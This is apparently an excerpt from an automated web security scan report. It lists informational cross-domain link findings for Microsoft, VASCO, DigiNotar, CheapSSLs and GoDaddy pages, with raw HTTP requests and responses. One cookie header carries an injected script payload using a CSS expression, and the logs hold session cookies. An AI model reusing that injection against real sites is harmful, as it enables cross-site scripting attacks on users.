Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; s_cc=true; s_sq=%5B%5BB%5D%5D; SH=27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7||xss.cx sqli httpi rxss||xss

Response

17.25. http://research.microsoft.com/apps/pubs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/pubs/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://research.microsoft.com/apps/pubs/default.aspx?id=136976

The response contains the following links to other domains:

http://msnportalbetarmc.112.2o7.net/b/ss/msnportalbetarmc/1/H.1--NS/0
http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/pubs/default.aspx?id=136976 HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.26. http://research.microsoft.com/apps/search/videosearch.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/search/videosearch.ashx

Issue detail

The page was loaded from a URL containing a query string:

http://research.microsoft.com/apps/search/videosearch.ashx?

The response contains the following links to other domains:

http://msnportalbetarmc.112.2o7.net/b/ss/msnportalbetarmc/1/H.1--NS/0
http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/search/videosearch.ashx? HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 12:57:57 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...
<noscript>
<img src=http://msnportalbetarmc.112.2O7.net/b/ss/msnportalbetarmc/1/H.1--NS/0 height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

17.27. http://research.microsoft.com/apps/video/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/video/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://research.microsoft.com/apps/video/default.aspx?id=103780

The response contains the following links to other domains:

http://msnportalbetarmc.112.2o7.net/b/ss/msnportalbetarmc/1/H.1--NS/0
http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.mp3
http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.mp4
http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.pdf
http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.wma
http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.wmv
http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.xps
http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/video/default.aspx?id=103780 HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 12:57:57 GMT
Connection: close
Content-Length: 75147

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...
</h1><a href="http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.wmv" onClick="stc(this, 24)"><img border="0" align="absmiddle" width="16" height="16" src="/a/i/d/zuneicon.png">
...[SNIP]...
<br><a href="http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.mp4" onClick="stc(this, 25)"><img border="0" align="absmiddle" width="16" height="16" src="/a/i/d/ipodicon.png">
...[SNIP]...
<br><a href="http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.wma" onClick="stc(this, 26)"><img border="0" align="absmiddle" width="16" height="16" src="/a/i/d/wmaicon.png">
...[SNIP]...
<br><a href="http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.mp3" onClick="stc(this, 27)"><img border="0" align="absmiddle" width="16" height="16" src="/a/i/d/mp3icon.png">
...[SNIP]...
<br><a target="_new" href="http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.xps" onClick="stc(this, 28)"><img border="0" align="absmiddle" width="16" height="16" src="/a/i/d/xpsicon.png"></a><a target="_new" href="http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.xps" onClick="stc(this, 29)">Slides (XPS)</a><br><a target="_new" href="http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.pdf" onClick="stc(this, 30)"><img border="0" align="absmiddle" width="16" height="16" src="/a/i/d/pdficon.png"></a><a target="_new" href="http://msrvideo.vo.msecnd.net/rmcvideos/103780/dl/103780.pdf" onClick="stc(this, 31)">Slides (PDF)</a>
...[SNIP]...
<noscript>
<img src=http://msnportalbetarmc.112.2O7.net/b/ss/msnportalbetarmc/1/H.1--NS/0 height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

17.28. http://s7.addthis.com/js/250/addthis_widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s7.addthis.com
Path:	/js/250/addthis_widget.js

Issue detail

The page was loaded from a URL containing a query string:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a70a804070ddf37

The response contains the following links to other domains:

http://www.hyves.nl/respect/button?url={{URL}}
http://www.stumbleupon.com/badge/embed/{{STYLE}}/?url={{URL}}

Request

GET /js/250/addthis_widget.js?pub=xa-4a70a804070ddf37 HTTP/1.1
Host: s7.addthis.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; uid=4e5e3f1ae3fd7427; psc=3; uvc=15|35

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 25 Aug 2011 11:55:33 GMT
ETag: "f80f13-11f96-4ab531b26b740"
Accept-Ranges: bytes
Content-Length: 73622
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:12:24 GMT
Connection: close
Vary: Accept-Encoding

/* (c) 2008, 2009, 2010 Add This, LLC */
if(!window._ate){var _atd="www.addthis.com/",_atr="//s7.addthis.com/",_atn="//l.addthiscdn.com/",_euc=encodeURIComponent,_duc=decodeURIComponent,_atc={dr:0,ver
...[SNIP]...
yle||"1",aZ=aG.share.url=ai.href||_ate.track.mgu(aG.share.url,{defrag:1}),a6=ai.height||"20px",au=ai.width||"75px";if(aa=="5"){a6=ai.height||"60px"}else{if(aa=="6"){a6=ai.height||"31px"}}aI.innerHTML='<iframe src="//www.stumbleupon.com/badge/embed/{{STYLE}}/?url={{URL}}" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:{{WIDTH}}; height:{{HEIGHT}};" allowtransparency="true"></iframe>
...[SNIP]...
",a6).replace("{{WIDTH}}",au);aI.noh=aI.ost=1}else{if(a1.indexOf("hyves_respect")>-1){var a9=h(aI,"hy:respect"),ae=aG.share.url=a9.url||_ate.track.mgu(aG.share.url,{defrag:1}),aS=a9.width||"140px",aJ='<iframe src="//www.hyves.nl/respect/button?url={{URL}}" style="border: medium none; overflow:hidden; width:{{WIDTH}}; height:22px;" scrolling="no" frameborder="0" allowTransparency="true" ></iframe>
...[SNIP]...

17.29. https://support.microsoft.com/contactus/emailcontact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.microsoft.com
Path:	/contactus/emailcontact.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://support.microsoft.com/contactus/emailcontact.aspx?scid=sw;en;1247&ws=careers

The response contains the following link to another domain:

https://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No

Request

GET /contactus/emailcontact.aspx?scid=sw;en;1247&ws=careers HTTP/1.1
Host: support.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B06
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Sat, 03 Sep 2011 13:28:25 GMT
Connection: close
Content-Length: 28082

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="1247" /><meta name="DCSext.sup_cln" content="en" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCSext.sup_ln" content="en-us" />
...[SNIP]...
<noscript><img alt="" id="DCSIMG" width="1" height="1" src="https://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No" /></noscript>
...[SNIP]...

17.30. http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx?query=xss

The response contains the following links to other domains:

http://s.ytimg.com/yt/img/creators_corner/Subscribe_to_my_videos/YT_Subscribe_160x27_red.png
http://s7.addthis.com/js/250/addthis_widget.js
http://static01.linkedin.com/scds/common/u/img/webpromo/btn_cofollow_badge.png
http://twitter-badges.s3.amazonaws.com/follow_us-a.png
http://www.addthis.com/bookmark.php?v=250&username=xa-4c99effd765dd67e
http://www.linkedin.com/company/vasco-data-security?trk=fc_badge
http://www.twitter.com/VASCODataNews
http://www.youtube-nocookie.com/gen_204?feature=creators_cornier-http%3A//s.ytimg.com/yt/img/creators_corner/Subscribe_to_my_videos/YT_Subscribe_160x27_red.png
http://www.youtube.com/user/vascodatasecurity10

Request

GET /company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx?query=xss HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.6.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:34:19 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 19569

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<div class="addthis_toolbox addthis_default_style">
                               <a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4c99effd765dd67e" class="addthis_button_compact">Share</a>
...[SNIP]...
</div>
                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

                   <a class="twitter-followus-button" target="_blank" href="http://www.twitter.com/VASCODataNews"><img src="http://twitter-badges.s3.amazonaws.com/follow_us-a.png" alt="Follow VASCODataNews on Twitter"/></a>
                   <a class="twitter-followus-button" target="_blank" href="http://www.linkedin.com/company/vasco-data-security?trk=fc_badge"><img src="http://static01.linkedin.com/scds/common/u/img/webpromo/btn_cofollow_badge.png" locale="en" alt="Vasco Data Security on LinkedIn"></a>
                   <a class="twitter-followus-button" target="_blank" href="http://www.youtube.com/user/vascodatasecurity10"><img src="http://s.ytimg.com/yt/img/creators_corner/Subscribe_to_my_videos/YT_Subscribe_160x27_red.png" alt="Subscribe to me on YouTube"/></a><img src="http://www.youtube-nocookie.com/gen_204?feature=creators_cornier-http%3A//s.ytimg.com/yt/img/creators_corner/Subscribe_to_my_videos/YT_Subscribe_160x27_red.png" style="display: none"/>
                   
...[SNIP]...

17.31. http://www.cheapssls.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search

The response contains the following links to other domains:

http://www.kayako.com/products/live-chat-software/
https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://support.cheapssl.com/index.php?/cheapssl
https://www.paypal.com/en_US/i/bnr/horizontal_solution_PPeCheck.gif

Request

Response

17.32. http://www.cheapssls.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.cheapssls.com/index.php?status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search&features_hash=P14

The response contains the following links to other domains:

http://www.kayako.com/products/live-chat-software/
https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://support.cheapssl.com/index.php?/cheapssl
https://www.paypal.com/en_US/i/bnr/horizontal_solution_PPeCheck.gif

Request

GET /index.php?status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search&features_hash=P14 HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6; __utmd=1; __utma=207162305.1887707563.1315085424.1315085424.1315085500.2; __utmb=207162305.2.9.1315095837676; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

17.33. https://www.cheapssls.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

https://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search

The response contains the following links to other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://support.cheapssl.com/index.php?/cheapssl
https://www.paypal.com/en_US/i/bnr/horizontal_solution_PPeCheck.gif

Request

GET /?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085500.2; __utmb=207162305.4.9.1315095868404; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A7%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A7%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A7; stat_uniq_code=134386

Response

17.34. https://www.cheapssls.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

https://www.cheapssls.com/index.php?dispatch=checkout.checkout

The response contains the following links to other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://support.cheapssl.com/index.php?/cheapssl
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/996013492/?label=mqLKCJyjtgIQtOv32gM&guid=ON&script=0
https://www.paypal.com/en_US/i/bnr/horizontal_solution_PPeCheck.gif

Request

Response

17.35. https://www.cheapssls.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

https://www.cheapssls.com/index.php?dispatch=checkout.cart

The response contains the following links to other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://support.cheapssl.com/index.php?/cheapssl
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/996013492/?label=w8cgCKSitgIQtOv32gM&guid=ON&script=0
https://www.paypal.com/en_US/i/bnr/horizontal_solution_PPeCheck.gif

Request

GET /index.php?dispatch=checkout.cart HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

17.36. http://www.diginotar.com/SearchResults/tabid/37/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diginotar.com
Path:	/SearchResults/tabid/37/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.diginotar.com/SearchResults/tabid/37/Default.aspx?Search=xss

The response contains the following links to other domains:

http://websitehosting.cc/
http://www.diginotar.es/
http://www.diginotar.nl/

Request

GET /SearchResults/tabid/37/Default.aspx?Search=xss HTTP/1.1
Host: www.diginotar.com
Proxy-Connection: keep-alive
Referer: http://www.diginotar.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.3.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar; language=en-US

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:37:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<div id="divLanguage">

<a href="http://www.diginotar.nl" title="Nederlands"><img src='/Portals/0/Skins/DigiNotar_V7_COM/image/default/language/nl.gif' alt="Nederlands" /></a><a href="http://www.diginotar.es" title="Espanol"><img src='/Portals/0/Skins/DigiNotar_V7_COM/image/default/language/es.gif' alt="Espanol" />
...[SNIP]...
<p class="dnn"><a href="http://websitehosting.cc">Hosting</a>
...[SNIP]...

17.37. http://www.godaddy.com/Payment/payment-options.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/Payment/payment-options.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.godaddy.com/Payment/payment-options.aspx?ci=11266

The response contains the following links to other domains:

http://img1.wsimg.com/assets/godaddy.ico
http://img1.wsimg.com/assets/prepayment/26125_img_payment_cc.gif
http://img1.wsimg.com/assets/prepayment/PayPal_mark_80x50.gif
http://img1.wsimg.com/assets/prepayment/btn_acctexist_orange.gif
http://img1.wsimg.com/assets/prepayment/btn_createacct_orange.gif
http://img1.wsimg.com/assets/prepayment/img_giftcard.gif
http://img1.wsimg.com/assets/prepayment/img_payment_checks.gif
http://img1.wsimg.com/assets/prepayment/img_payment_gag_logo.gif
http://img1.wsimg.com/assets/prepayment/txt_payment_head.gif
http://img2.wsimg.com/fos/css/1/sales_http_20110711.css
http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css
http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js
http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2
http://img3.wsimg.com/fos/script/sales16.min.js
http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
http://www.bobparsons.me/index.php?id=-1
http://www.godaddycares.com/
https://email.secureserver.net/
https://login.secureserver.net/index.php
https://login.secureserver.net/index.php?isc=%22&ci=17195&prog_id=GoDaddy&app=wbe

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=6; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:26:07 GMT
Content-Length: 103730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/fos/css/1/sales_http_20110711.css" /><title>
...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" /><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css" />

   <link rel="canonical" href="http://www.godaddy.com/Payment/payment-options.aspx"/>
...[SNIP]...
